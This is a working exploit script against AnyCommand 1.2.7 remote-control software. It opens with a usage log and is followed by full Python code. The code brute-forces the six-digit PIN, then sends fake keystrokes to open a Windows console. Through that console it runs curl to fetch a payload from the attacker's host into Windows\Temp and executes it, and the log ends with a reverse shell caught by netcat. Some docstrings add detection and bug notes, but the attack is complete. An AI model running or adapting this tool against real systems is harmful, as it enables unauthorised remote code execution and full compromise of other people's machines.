# Exploit Title: AnyCommand 1.2.7 - Remote Code Execution
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://anycommand.io/
# Software Link: https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download
# Version: 1.2.7
# Tested on: Windows 10
'''
Description:
AnyCommand 1.2.7 contains critical vulnerabilities enabling unauthenticated
attackers to achieve remote code execution. The exploit bypasses weak 6-digit
PIN authentication through bruteforcing, then abuses the command interface to
simulate keystrokes for command execution and payload delivery. This two-stage
attack (PIN cracking followed by arbitrary command execution) requires only
network access to the vulnerable service and leads to full system compromise.

usage:

python exp.py --bruteforce --host 192.168.8.105
[*] Bruteforcing PINs from 0 to 999999 (total: 1000000)
[*] Press Ctrl+C to stop
[>] Progress: 80.3% | Current PIN: 803429
[+] SUCCESS! Found PIN: 803477
[+] Use this PIN: --pin 803477

python exp.py --pin 803477 --lhost 192.168.8.100 --host 192.168.8.105
[*] Connected. Authenticating...
[✓] Authentication successful
[+] Payload executed. Waiting for connection...
[+] Exploit completed successfully

nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.8.105 50459
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\\Users\\hack>
'''

import socket
import json
import time
import argparse
import sys


# Characters that are sent with a verb other than the plain ``KEY:<char>`` form.
_SPECIAL_KEYS = {":": "TYPE::", "&": "TYPE:&", " ": "KEY:space"}


def send_line(sock, message):
    """Write one protocol line (``message`` plus a trailing newline) to ``sock``."""
    sock.sendall(f"{message}\n".encode())


def send_text(sock, text, delay=0.05):
    """Type ``text`` one character at a time as keystroke lines.

    Every character becomes its own ``KEY:``/``TYPE:`` line (``_SPECIAL_KEYS``
    lists the three that are not sent as ``KEY:<char>``), followed by ``delay``
    seconds of sleep, so the call blocks for roughly ``len(text) * delay``
    seconds in total.
    """
    for ch in text:
        send_line(sock, _SPECIAL_KEYS.get(ch, f"KEY:{ch}"))
        time.sleep(delay)


def recv_quick(sock, timeout=1.0):
    """Read up to 1024 bytes from ``sock`` with a short timeout.

    Returns the text decoded with ``errors="ignore"`` and stripped, or ``""``
    on timeout or any other error. The socket is always returned to blocking
    mode (``settimeout(None)``) before this function exits.
    """
    sock.settimeout(timeout)
    try:
        return sock.recv(1024).decode(errors="ignore").strip()
    except BaseException:
        # Deliberately catches everything, KeyboardInterrupt included: a
        # Ctrl+C that lands inside recv() is reported as an empty read.
        return ""
    finally:
        sock.settimeout(None)


def try_pin(host, port, pin_str):
    """Open a fresh connection to ``host:port`` and test a single PIN.

    The greeting is read first and an empty greeting counts as failure. The
    PIN is then submitted in two JSON shapes, ``{"pin": ...}`` and
    ``{"auth": {"pin": ...}}``; the attempt succeeds as soon as a reply
    contains ``AUTH_SUCCESS``. Any exception at all (connect failure, timeout,
    KeyboardInterrupt) is reported as ``False``. The socket is closed on every
    path.
    """
    try:
        sock = socket.socket()
        sock.settimeout(2.0)
        sock.connect((host, port))
        if not recv_quick(sock):
            return False
        candidates = (
            json.dumps({"pin": pin_str}),
            json.dumps({"auth": {"pin": pin_str}}),
        )
        for attempt in candidates:
            sock.sendall(f"{attempt}\n".encode())
            if "AUTH_SUCCESS" in recv_quick(sock):
                return True
        return False
    except BaseException:
        return False
    finally:
        sock.close()


def bruteforce(host, port, start=0, end=999999):
    """Sequentially try every PIN in ``[start, end]``, zero-padded to 6 digits.

    Progress is printed in place at most every 0.5 s. Returns the PIN string
    that authenticated, or ``None`` when the range is exhausted or the loop is
    interrupted with Ctrl+C.

    Each attempt is a separate TCP connection (see ``try_pin``), so a full
    sweep is up to one million connections to the service port. That is easy
    to spot with connection-rate monitoring, and a server-side lockout or
    back-off on failed PINs would stop it; nothing here handles one, which
    suggests the service enforces none (unverified from this file).

    Note that the broad excepts in ``recv_quick`` and ``try_pin`` also swallow
    KeyboardInterrupt, so the handler below only fires when Ctrl+C lands
    between ``try_pin`` calls.
    """
    total = end - start + 1
    found_pin = None
    update_interval = 0.5
    last_update = time.time()
    print(f"[*] Bruteforcing PINs from {start} to {end} (total: {total})")
    print("[*] Press Ctrl+C to stop")
    try:
        for idx, value in enumerate(range(start, end + 1)):
            pin_str = str(value).zfill(6)
            now = time.time()
            if now - last_update > update_interval:
                progress = (idx / total) * 100
                print(f"\r[>] Progress: {progress:.1f}% | Current PIN: {pin_str}", end="", flush=True)
                last_update = now
            if try_pin(host, port, pin_str):
                found_pin = pin_str
                print(f"\n[+] SUCCESS! Found PIN: {found_pin}")
                break
    except KeyboardInterrupt:
        print("\n[!] Bruteforce interrupted by user")
    if found_pin is None:
        print("\n[-] Bruteforce completed. No valid PIN found.")
    return found_pin


def execute_payload(host, port, pin, lhost, payload):
    """Authenticate with ``pin`` and drive the keystroke interface to fetch and run ``payload``.

    Expects the greeting ``AUTH_REQUIRED`` exactly, then submits the PIN in the
    same two JSON shapes as ``try_pin``. On ``AUTH_SUCCESS`` it types, as
    keystrokes: the Win key, ``cmd``, Enter (presumably opening a console via
    Start-menu search), then a ``curl`` download of ``{lhost}/{payload}`` into
    ``\\Windows\\Temp``, Enter, then the dropped file's path, Enter. Returns
    ``True`` after the final Enter and a 3 s sleep; ``False`` on an unexpected
    greeting, failed authentication or any ``Exception``.

    The destination path carries no drive letter, so it is resolved against
    the console's current drive. The download URL has no scheme, so curl will
    use plain HTTP. Host-side this is a conventional detection chain: console
    launch, curl.exe writing an executable under Windows\\Temp, then that file
    being executed from there.
    """
    try:
        sock = socket.create_connection((host, port), timeout=5)
        print("[*] Connected. Authenticating...")
        if recv_quick(sock) != "AUTH_REQUIRED":
            return False
        candidates = (
            json.dumps({"pin": pin}),
            json.dumps({"auth": {"pin": pin}}),
        )
        for blob in candidates:
            sock.sendall(f"{blob}\n".encode())
            if "AUTH_SUCCESS" not in recv_quick(sock):
                continue
            print("[✓] Authentication successful")
            # Open a console: Win key, type "cmd", Enter.
            send_line(sock, "KEY:win")
            time.sleep(1)
            send_text(sock, "cmd", delay=0.5)
            time.sleep(1)
            send_line(sock, "KEY:enter")
            time.sleep(1)
            # Fetch the payload into \Windows\Temp (drive-relative path).
            download_cmd = f"curl {lhost}/{payload} -o \\Windows\\Temp\\{payload}"
            send_text(sock, download_cmd, delay=0.3)
            time.sleep(0.5)
            send_line(sock, "KEY:enter")
            time.sleep(1)
            # Execute the dropped file.
            exec_cmd = f"\\Windows\\Temp\\{payload}"
            send_text(sock, exec_cmd, delay=0.3)
            time.sleep(0.5)
            send_line(sock, "KEY:enter")
            print("[+] Payload executed. Waiting for connection...")
            time.sleep(3)
            return True
        print("[-] Authentication failed")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False
    finally:
        # NOTE(review): if create_connection() itself raised, ``sock`` was never
        # bound and this line raises UnboundLocalError after the error message.
        sock.close()


def main():
    """Command-line entry point.

    ``--bruteforce`` runs the PIN sweep and prints the hit; ``--pin`` together
    with ``--lhost`` runs the payload stage. Exits with status 1 when neither
    mode is selected or ``--lhost`` is missing.
    """
    parser = argparse.ArgumentParser(description='AnyCommand Exploit by blue0x1(chokri hammedi) \n')
    parser.add_argument('--host', required=True, help='Target IP address')
    parser.add_argument('--port', type=int, default=8000, help='Target port')
    parser.add_argument('--lhost', help='Attacker IP for payload delivery')
    parser.add_argument('--payload', default='shell.exe', help='Payload filename')
    parser.add_argument('--pin', help='Specific PIN to try')
    parser.add_argument('--bruteforce', action='store_true', help='Bruteforce PIN')
    args = parser.parse_args()

    if args.bruteforce:
        found_pin = bruteforce(args.host, args.port, 0, 999999)
        if found_pin:
            print(f"[+] Use this PIN: --pin {found_pin}")
        return

    if not args.pin:
        print("[-] Please specify either --pin or --bruteforce")
        sys.exit(1)
    if not args.lhost:
        print("[-] Please specify --lhost for payload delivery")
        sys.exit(1)

    succeeded = execute_payload(args.host, args.port, args.pin, args.lhost, args.payload)
    print("[+] Exploit completed successfully" if succeeded else "[-] Exploit failed")


if __name__ == "__main__":
    main()